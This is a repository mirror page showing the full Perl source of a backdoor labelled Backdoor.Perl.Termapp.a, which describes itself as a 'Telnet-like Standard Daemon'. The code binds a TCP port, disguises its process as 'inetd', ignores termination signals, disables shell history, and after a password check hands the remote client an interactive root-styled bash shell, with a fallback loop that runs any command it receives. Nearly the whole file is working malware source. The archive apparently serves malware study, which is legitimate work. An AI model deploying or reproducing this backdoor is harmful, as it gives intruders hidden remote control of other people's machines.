daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity
Files
8337248c702f90b6621b12673d34ca12f10024b1
MalwareSourceCode/Perl/Backdoor.Perl.Termapp.a
T
vxunderground 06828a0956 Add files via upload
2020-10-09 21:59:39 -05:00

463 lines
11 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# Telnet-like Standard Daemon 0.7
#
# 0ldW0lf - oldwolf@atrixteam.net
# - old-wolf@zipmai.com
# - www.atrix.cjb.net
# - www.atrixteam.net
#
# For those guys that still like to open ports
# and use non-rooted boxes
#
# This has been developed to join in the TocToc
# project code, now it's done and I'm distributing
# this separated
#
# This one i made without IO::Pty so it uses
# only standard modules... enjoy it
#
# tested on linux boxes.. probably will work fine on others
# any problem... #atrix@irc.brasnet.org
#
##########################################################
# ******************* CONFIGURATION ******************** #
##########################################################
my $PORT = $ARGV[0] || 3847; # default port is 3847
my $PASS = 'ouhEUhhJ6RbwE'; # encripted password
my $SHELL = "/bin/bash"; # shell to be executed
my $HOME = "/tmp"; # your HOME
my $PROC = "inetd"; # name of the process
my $PASS_PROMPT = "Password: "; # password prompt
my $WRONG_PASS = "Password Errata!"; # "wrong password" message
my @STTY = ('sane', 'dec'); # stty arguments
##########################################################
# feel free to change the ENV
#### ENVironment ####
$ENV{HOME} = $HOME;
#$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
# colorful PS1 is also funny :)
$ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
$ENV{MAIL} = '/var/mail/root';
$ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
$ENV{HISTFILE} = '/dev/null';
$ENV{USER} = 'root';
$ENV{LOGNAME} = 'root';
$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
$ENV{LS_COLORS} = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
$ENV{SHELL} = $SHELL;
$ENV{TERM} = 'xterm';
#####################
$0=$PROC."\0";
use IO::Socket;
use IO::Select;
use POSIX;
use strict;
# i wouldn't change that
# if i were you
###### SIGnals ######
$SIG{HUP} = 'IGNORE';
$SIG{PS} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = sub { wait; };
#####################
# ioctl stuff
my %IOCTLDEF;
$IOCTLDEF{TIOCSWINSZ} = 0x5414;
$IOCTLDEF{TIOCNOTTY} = 0x5422;
$IOCTLDEF{TIOCSCTTY} = 0x540E;
safeload('sys/ttycom.ph', 1); # BSD
safeload('sys/ioctl.ph', 1);
safeload('asm/ioctls.ph', 1);
foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined(&{$IOCTL}));
if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
while(<IOD>) {
if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
eval "sub $IOCTL () {$1;}";
last;
}
}
close(IOD);
}
# i realy dunno if i can do that.. but.. here it goes
eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
}
# starting...
$PORT = $ARGV[0] if ($ARGV[0]);
chdir('/');
no strict 'refs';
my $bindfd = *{'bind_sock'};
*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
my $bind = \*{$bindfd};
my $pid = fork();
die "ERROR: I could not fork() the process." unless defined($pid);
exit if $pid;
my %CLIENT;
my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();
# main loop...
while ( 1 ) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
read_clients();
read_shells();
}
sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));
}
sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$sel_serv->add($newcon);
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
$fh->autoflush(1);
do_client($newcon, '3', '5', '1');
sleep(1);
write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
close_client($fh);
} else {
telnet_parse($fh, $msg);
}
}
}
sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));
}
sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split('', $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /\r|\n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = '';
$pass =~ s/\n//g;
$pass =~ s/\0//g;
$pass =~ s/\r//g;
if (crypt($pass, $PASS) ne $PASS) {
finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, chr(255).chr(253).chr(31));
write_client($cli, "\r\n\r\r\n\r");
new_shell($cli);
}
return();
}
$msg =~ s/\r\n\0\0//g;
$msg =~ s/\0//g;
$msg =~ s/\r\n/\n/g;
write_shell($cli, $msg);
}
}
sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
if ($nread == 0) {
finish_client($cli, "Terminal closed.\r\n\r");
} else {
write_client($cli, $msg);
}
}
sub to_chr {
my $chrs = '';
map { $chrs .= chr($_) } (split(/ +/, shift));
return($chrs);
}
sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
}
sub chr_parse {
my ($client, $chrs) = @_;
my $ords = '';
map { $ords .= ord($_).' ' } (split(//, $chrs));
my $msg = '';
if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
my $winsize = pack('C4', $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
}
foreach my $code (split("255 ", $ords)) {
if ($code =~ /(\d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
# do whatever you want dude ehehe
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
}
}
}
write_client($client, $msg) if ($msg);
return(1);
}
sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, "ERROR: No more pty´s avaliable\n");
return(undef);
}
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, "ERROR: fork()\n");
return(undef);
}
unless($pid) {
close($pty);
local(*DEVTTY);
if (open (DEVTTY, "/dev/tty")) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
close(DEVTTY);
}
POSIX::setsid();
ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
close($tty);
sleep(1);
foreach my $stty ("/bin/stty", "/usr/bin/stty") {
next unless (-x $stty);
map { system("$stty", $_) } @STTY;
}
chdir("$HOME");
{ exec("$SHELL") };
syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
while (my $msg = <STDIN>) {
$msg =~ s/\n$//;
$msg =~ s/\r$//;
if ($msg =~ /^\s*cd\s+(\S+)/) {
my $notf = "directory $1 not found!\n";
chdir($1) || syswrite(STDOUT, $notf, length($notf));
} else {
system("$msg 2>&1");
}
syswrite(STDOUT, "I'm FuCKeD!# ");
}
exit;
}
close($tty);
select($pty); $| = 1;
select(STDOUT);
set_raw($pty);
$CLIENT{$cli}->{shell} = $pty;
$sel_shell->add($pty);
return(1);
}
# Funciton set_raw() stolen from IO::Pty
sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
# warn "set_raw: new POSIX::Termios failed: $!";
return undef;
}
unless ($termios->getattr($ttyno)) {
# warn "set_raw: getattr($ttyno) failed: $!";
return undef;
}
$termios->setiflag(0);
$termios->setoflag(0);
$termios->setlflag(0);
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
# warn "set_raw: setattr($ttyno) failed: $!";
return undef;
}
return 1;
}
sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
for (my $i = 0; $i < 256; $i++) {
my $pty = get_tty($i, "/dev/pty");
next unless (open($PTY, "+> $pty"));
my $tty = get_tty($i, "/dev/tty");
unless(open($TTY, "+> $tty")) {
close($PTY);
next;
}
return($TTY, $PTY);
}
return();
}
sub get_tty {
my ($num, $base) = @_;
my @series = ('p' .. 'z', 'a' .. 'e');
my @subs = ('0' .. '9', 'a' .. 'f');
my $buf = $base;
$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];
return($buf);
}
sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::/\//g;
if ($require) {
# all found gonna be loaded
map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
} else {
$file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
}
return();
}
sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless ($shell);
foreach my $m (split_chars($msg, 20)) {
read_shells();
print $shell $m;
read_shells();
}
return(1);
}
sub split_chars {
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split ('', $msg);
my $done = 0;
while ( 1 ) {
my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) < 1);
push(@splited, $splited);
}
return(@splited);
}
sub finish_client {
my ($cli, $msg) = @_;
write_client($cli, $msg);
close_client($cli);
}
sub close_client {
my $cli = shift;
my $sock = $CLIENT{$cli}->{sock};
$sel_serv->remove($sock);
if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sel_shell->remove($shell);
close($shell);
}
$sock->close() if($sock);
delete($CLIENT{$cli});
}
sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);
}
Reference in New Issue View Git Blame Copy Permalink